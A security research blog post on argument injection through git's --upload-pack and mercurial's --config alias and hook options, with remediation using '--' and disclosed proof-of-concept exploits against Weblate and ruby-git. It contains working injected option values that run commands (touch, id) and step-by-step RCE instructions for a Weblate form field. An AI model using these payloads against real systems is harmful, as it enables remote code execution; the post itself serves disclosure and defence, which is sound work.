Rediscovering argument injection when using VCS tools — git and mercurial

Written by:
Alessio Della Libera

August 23, 2022

One of the main goals of this research was to explore how it is possible to execute arbitrary commands even when using a safe API that prevents command injection. The focus is on Version Control System (VCS) tools like git and hg (mercurial), which offer options that allow the execution of arbitrary commands under some circumstances.

The targets for this research are web applications and library projects (written in any programming language) that call these commands using a safe API. We haven’t targeted CLI projects, or projects that call those commands by using data coming from stored sources like configuration files.

In this blog post, we aim to demonstrate common scenarios where, even when using a safe API, it's possible to execute arbitrary commands through argument injection. We’ll also provide remediation examples and suggestions for open source maintainers.

Argument injection background

Consider the following scenario: a developer wants to call git or hg commands from their project directory in order to interact with repositories. However, user controlled values are used as parameters to these commands (allowing the users to specify the repository url, the branch name, etc). Since the developer is aware of the command injection vulnerability, they decide to use a safe API to execute shell commands. For example, if the project is in Node.js, the spawn API from child_process module prevents command injection when called the following way:

spawn("command", ["-option1", user_input1, user_input2])

However, this does not always prevent command execution. As we’ll see soon, it also depends on the command called by these APIs. If you want to know more about argument injection, this Staaldraad article is a great resource.
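
To make the distinction concrete, here is a minimal Python sketch. It does not involve git at all: the child process is simply the Python interpreter printing the arguments it received, and the helper name show_received_args is made up for this illustration. It suggests that a list-based, shell-free API hands every value to the program verbatim, so shell metacharacters are harmless, but a value that starts with a dash arrives just as untouched, and the called program decides what it means.

```python
import json
import subprocess
import sys


def show_received_args(*user_values):
    """Run a child process without a shell and return the arguments it saw."""
    # The child only echoes back its own argument list as JSON.
    child_code = "import json, sys; print(json.dumps(sys.argv[1:]))"
    result = subprocess.run(
        [sys.executable, "-c", child_code, *user_values],
        capture_output=True,
        text=True,
        check=True,
    )
    return json.loads(result.stdout)


# Shell metacharacters are not interpreted: the payload is one literal argument.
print(show_received_args("& touch NOT_WORKING;"))

# An option-looking value is delivered just as faithfully.
print(show_received_args("--upload-pack=touch HELLO", "foo"))
```

Whether the second call is dangerous depends entirely on how the receiving program parses its arguments, which is what the rest of this post explores.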

Why should we care about git?

In some git subcommands, there are options that allow the user to specify which programs/commands will be executed. One example is the --upload-pack option, which is available in several git subcommands.

Let's take, for example, the git fetch, git ls-remote and git pull subcommands, which all implement the --upload-pack option.

Depending on the command, they have certain required arguments followed by optional ones. For example git fetch requires at least one argument, i.e a repository, followed by refspec and a set of options.

Running the following commands in a terminal will execute the shell commands touch HELLO1, touch HELLO2 and touch HELLO3 respectively:

git ls-remote --upload-pack="touch HELLO1" master
git fetch origin --upload-pack="touch HELLO2" # run git init first, or run inside a git project
git pull origin --upload-pack="touch HELLO3" # run git init first, or run inside a git project

What does vulnerable code look like with “git”?

To demonstrate this vulnerability, I’ll use JavaScript and Python. To keep the examples short, let’s assume that the url and branch values are controlled by the user and not properly sanitized.

The following example demonstrates how it’s still possible to run arbitrary code, even when using a safe API that protects against classic command injections:

JavaScript (NodeJS)

const cp = require("child_process")
const url = "--upload-pack=touch HELLO_JS"
const branch = "foo"
cp.spawn("git", ["ls-remote", url, branch])
cp.spawn("git", ["ls-remote", "& touch NOT_WORKING;", "foo"])

The last line demonstrates that a normal command injection payload (i.e a payload with special characters like ; & | , etc. to chain commands) does not work.

Python

import subprocess
url = "--upload-pack=touch HELLO_PY"
branch = "foo"

subprocess.Popen(["git", "ls-remote", url, branch], shell=False)

It’s important to note that the above scenarios lead to command execution only if the arguments required by the corresponding git subcommand are provided. For example, if the payload is the only argument passed to the git ls-remote subcommand, the previous scenarios will not work:

JavaScript (NodeJS)

const cp = require("child_process")
const url = "--upload-pack=touch HELLO_JS"
cp.spawn("git", ["ls-remote", url])
// fatal: No remote configured to list refs from.

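This is because the only argument provided is consumed as an option, which leaves git ls-remote without a repository to contact, so the program given in --upload-pack is never started. If the command is given another argument that can serve as the repository, we are in the previous case and can still execute code.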

Remediation suggestions

A possible solution to previous scenarios would be to add -- before user controlled values. As the official documentation explains, “when writing a script that is expected to handle random user-input, it is a good practice to make it explicit which arguments are which by placing disambiguating -- at appropriate places.”

For example, the following code will no longer lead to command execution:

const cp = require("child_process")
const url = "--upload-pack=touch HELLO_JS"
const branch = "foo"
cp.spawn("git", ["ls-remote", "--", url, branch])
// fatal: strange pathname '--upload-pack=touch HELLO_JS' blocked
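
The effect of -- can be illustrated without running git at all. The sketch below uses Python's argparse module to build a toy parser that only resembles git ls-remote (an --upload-pack option, a repository, and optional refs). It is not git's real parser, and the names toy_ls_remote_parser and classify are invented for this example. It shows the same value being read as an option without the separator, and as a plain positional value with it.

```python
import argparse


def toy_ls_remote_parser():
    """Toy stand-in for `git ls-remote` argument parsing (not git's real parser)."""
    parser = argparse.ArgumentParser(prog="toy-ls-remote")
    parser.add_argument("--upload-pack")
    parser.add_argument("repository", nargs="?")
    parser.add_argument("refs", nargs="*")
    return parser


def classify(argv):
    """Return how the toy parser interprets the given argument list."""
    ns = toy_ls_remote_parser().parse_args(argv)
    return {
        "upload_pack": ns.upload_pack,
        "repository": ns.repository,
        "refs": ns.refs,
    }


payload = "--upload-pack=touch HELLO"

# Without the separator, the payload is parsed as an option.
print(classify([payload, "foo"]))

# With the separator, the payload is treated as the repository name.
print(classify(["--", payload, "foo"]))
```

In the first call the payload ends up in upload_pack and foo becomes the repository. In the second call upload_pack stays unset and the payload is only a (nonsensical) repository name.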

Why should we care about hg (mercurial)?

As we saw in the previous section, some conditions need to be satisfied in order to execute arbitrary commands (i.e required arguments). However, this is not the case for hg  — making exploitation much easier.

Among the several options available, mercurial allows users to specify aliases and hooks for every command (clone, init, log, etc.) by using the --config option.

As the mercurial documentation explains, aliases “allow you to define your own commands in terms of other commands (or aliases), optionally including arguments.  An alias can start with an exclamation point ("!") to make it a shell alias.  A shell alias is executed with the shell, allowing you to run arbitrary commands, for example:

echo = !echo $@

will let you do "hg echo foo" to have "foo" printed in your terminal.”

Hooks, on the other hand, are “commands or Python functions that get automatically executed by various actions such as starting or finishing a commit.” They are commands that are executed once some conditions are satisfied, and can be executed before (pre-<command>) or after (post-<command>) other mercurial commands.

What does vulnerable code look like while using “hg init”?

Let’s see an example of how it’s possible to execute arbitrary commands when the hg init command is called with unsanitized user inputs.

Alias example

hg init --config=alias.init="!touch HELLO"

The touch HELLO command will be executed. This is because an alias to the init command is defined and executed instead of the hg init command.

The same command executed from code will look like the following (as before, let’s assume that the source is controlled by the user and not properly sanitized):

JavaScript (NodeJS)

const cp = require("child_process")

const source = "--config=alias.init=!touch HELLO_JS"
cp.spawn("hg", ["init", source])

Python

import subprocess
source = "--config=alias.init=!touch HELLO_PY"
subprocess.call(["hg", "init", source])

Hooks example

hg init --config=hooks.pre-init="touch HELLO"

The touch HELLO command will be executed before the init command runs (this is what the pre-<command> hook name means).

The same command executed from code will look like the following:

JavaScript (NodeJS)

const cp = require("child_process")

const source = "--config=hooks.pre-init=touch HELLO_JS"
cp.spawn("hg", ["init", source])

Python

import subprocess
source = "--config=hooks.pre-init=touch HELLO_PY"
subprocess.call(["hg", "init", source])

Unlike the case of git, in order to execute arbitrary commands, we only need to control one argument provided to mercurial commands — even if it's the only parameter being used.
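
The payloads above all share the section.name=value shape that --config accepts. The following sketch splits such a value into its three parts to make explicit which configuration entry each payload sets. It illustrates the format only and is not Mercurial's own parsing code; parse_config_override and ConfigOverride are hypothetical names.

```python
from typing import NamedTuple


class ConfigOverride(NamedTuple):
    section: str
    name: str
    value: str

    @property
    def executes_code(self) -> bool:
        """True for the two cases discussed above: shell aliases and hooks."""
        is_shell_alias = self.section == "alias" and self.value.startswith("!")
        return is_shell_alias or self.section == "hooks"


def parse_config_override(argument: str) -> ConfigOverride:
    """Split '--config=section.name=value' into section, name and value."""
    prefix = "--config="
    if not argument.startswith(prefix):
        raise ValueError("not a --config override")
    key, sep, value = argument[len(prefix):].partition("=")
    section, dot, name = key.partition(".")
    if not (sep and dot and section and name):
        raise ValueError("expected section.name=value")
    return ConfigOverride(section, name, value)


for payload in (
    "--config=alias.init=!touch HELLO_PY",
    "--config=hooks.pre-init=touch HELLO_PY",
):
    override = parse_config_override(payload)
    print(override, override.executes_code)
```

Read this way, the alias payload redefines init as a shell alias, and the hooks payload registers a command to run before init. In both cases a single user controlled argument is enough.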

Remediation suggestions

Once again, we can address this issue by adding the -- characters before user controlled arguments.

For example, the following exploit no longer works. Instead, hg creates a repository folder whose name is the content of the source variable:

const cp = require("child_process")

const source = "--config=alias.init=!touch HELLO_JS"
cp.spawn("hg", ["init", "--", source])

Outcomes

Similar issues have already been exploited in the past. Some well-known examples are the remote code execution attacks on CocoaPods Trunk and Phabricator.

The table below summarizes the issues that we found and disclosed as part of this research:

After these vulnerabilities were found, we privately reported them to maintainers, following our Vulnerability Disclosure policy. I want to personally thank all the maintainers I contacted for their time and for their collaboration.

In the following case studies, we’ll explain how it was possible to achieve remote code execution and command injection in these popular projects.

Case study: Remote code execution on Weblate

Weblate is a “web based localization tool with tight version control integration”. An authenticated user was able to get remote code execution via argument injection.

When adding new translation components and using mercurial repositories, the user input branch is used in the hg pull command without any proper sanitization.

The relevant code responsible for calling the hg pull command with user controlled values is:

# https://github.com/WeblateOrg/weblate/blob/0b45970ce1fb978be66ef696ff9983f1752828bc/weblate/vcs/mercurial.py#L364-L367
def update_remote(self):
    """Update remote repository."""
    self.execute(["pull", "--branch", self.branch])
    self.clean_revision_cache()

# https://github.com/WeblateOrg/weblate/blob/0b45970ce1fb978be66ef696ff9983f1752828bc/weblate/vcs/base.py#L230
def execute(
    self,
    args: List[str],
    ...
):
    ...
    try:
        self.last_output = self._popen( # <---
            args, # <---
            self.path,
            ...
        )
    ...
    return self.last_output

# https://github.com/WeblateOrg/weblate/blob/0b45970ce1fb978be66ef696ff9983f1752828bc/weblate/vcs/base.py#L191
@classmethod
def _popen(
    cls,
    args: List[str],
    ....
):
    """Execute the command using popen."""
    if args is None:
        raise RepositoryException(0, "Not supported functionality")
    if not fullcmd:
        args = [cls._cmd] + list(args)
    ...
    process = subprocess.run(
        args, # <---
        ...
    )
    ...
    return process.stdout

Proof of concept

To execute arbitrary commands, the user has to create a New Translation Component in a translation project with the Repository branch value set to --config=alias.pull=!id>/app/cache/static/output_rce1.txt. In this case, the id command will be executed and its output redirected to a file that will be accessible at http://localhost:8888/static/output_rce1.txt.

1. Log in to the application.

2. Add a new translation project and then click Save.

3. Add a new translation component (to the translation project just created) with the payload --config=alias.pull=!id>/app/cache/static/output_rce1.txt in the Repository Branch field and then click Continue.

4. The output of the command id will be available at http://localhost:8888/static/output_rce1.txt.

Remediation

It was also possible to achieve RCE when dealing with git repositories. In that case, the unsanitized user input repo was passed to the git ls-remote command.

Both issues were promptly fixed by the maintainer in version 4.11.1 (see the GitHub release). The fixes (for the mercurial and git cases) added the -- characters before the user input in order to prevent it from being interpreted as an option.

Case study: Command injection in ruby-git

ruby-git is a “library that can be used to create, read and manipulate Git repositories by wrapping system calls to the git binary”.

When calling the fetch(remote = 'origin', opts = {}) function, the remote parameter is passed to the git fetch subcommand without any sanitization. As we have seen before, git fetch is one of the git subcommands that accepts the --upload-pack argument. For more information on --upload-pack, review the git-fetch documentation.

The relevant code responsible for calling the git fetch command with user controlled values is:

# https://github.com/ruby-git/ruby-git/blob/521b8e7384cd7ccf3e6c681bd904d1744ac3d70b/lib/git/base.rb#L339-L341
def fetch(remote = 'origin', opts={})
    self.lib.fetch(remote, opts)  # <---
end

# https://github.com/ruby-git/ruby-git/blob/521b8e7384cd7ccf3e6c681bd904d1744ac3d70b/lib/git/lib.rb#L879
def fetch(remote, opts)
    arr_opts = [remote]
    arr_opts << opts[:ref] if opts[:ref]
    ...
    command('fetch', arr_opts)  # <---
end

# https://github.com/ruby-git/ruby-git/blob/521b8e7384cd7ccf3e6c681bd904d1744ac3d70b/lib/git/lib.rb#L1075
def command(cmd, *opts, &block)
    ...
    with_custom_env_variables do
        command_thread = Thread.new do
            output = run_command(git_cmd, &block) # <---
            exitstatus = $?.exitstatus
        end
        command_thread.join
    end

# https://github.com/ruby-git/ruby-git/blob/521b8e7384cd7ccf3e6c681bd904d1744ac3d70b/lib/git/lib.rb#L1179
def run_command(git_cmd, &block)
    return IO.popen(git_cmd, &block) if block_given? # <---
    `#{git_cmd}`.lines.map { |l| Git::EncodingUtils.normalize_encoding(l) }.join
end

Proof of concept

The following PoC demonstrates how it was possible to execute arbitrary commands:

require "git"

g = Git.init('project')

origin = "--upload-pack=touch ./HELLO1;"
g.fetch(origin, {:ref => 'some/ref/head'} )

# ls -la

Remediation

The issue was fixed by the maintainers in version 1.11.0 (GitHub release). Like in the previous issue, the fix introduced the -- characters before user controlled values.

Takeaways

… for developers

When calling commands through a safe API that prevents command injection but still receives user controlled values, it’s important to make sure that those values cannot change the behavior of the command by injecting or manipulating its options. To avoid this, the -- characters can be used to separate the command’s options from user controlled values.
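
One way to apply this advice consistently is to build every argument list through a single helper. The sketch below is a hypothetical example (build_vcs_argv is not part of any library): it keeps developer-chosen options before the -- separator and user controlled values after it. The optional strict mode, which rejects values that start with a dash, is an extra precaution assumed here rather than something the fixes described above rely on. Whether -- is accepted at a given position depends on the command being wrapped, so this should be checked against the documentation of each subcommand.

```python
from typing import List, Sequence


def build_vcs_argv(
    tool: str,
    subcommand: str,
    options: Sequence[str],
    user_values: Sequence[str],
    strict: bool = False,
) -> List[str]:
    """Build an argument list with user controlled values placed after '--'."""
    if strict:
        # Assumed extra precaution: refuse anything that looks like an option.
        for value in user_values:
            if value.startswith("-"):
                raise ValueError(f"option-like value rejected: {value!r}")
    return [tool, subcommand, *options, "--", *user_values]


argv = build_vcs_argv("git", "ls-remote", [], ["--upload-pack=touch HELLO", "foo"])
print(argv)
# The list would then be passed to a shell-free API such as subprocess.run(argv).
```

Centralizing the construction in one place means a new call site cannot forget the separator, which is the mistake both case studies had in common.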

… for maintainers

If a function/API wraps calls to commands that accept user controlled values, this behavior could be worth documenting. Otherwise, users may be confused when they see the maintainer handling some sanitization issues (like preventing command injection by using a safe API) but not others (like input that can be used as a dangerous option, leading to unexpected behavior).

… for security researchers

We focused our attention on git and hg commands, but there are many others that act similarly. It’s worth mentioning that even using safe APIs that prevent command injection can still lead to security issues. It all depends on the commands being executed. If you find similar issues (or any other security vulnerability) in an open source project supported by our program, please report it using the Snyk Vulnerability Disclosure form.
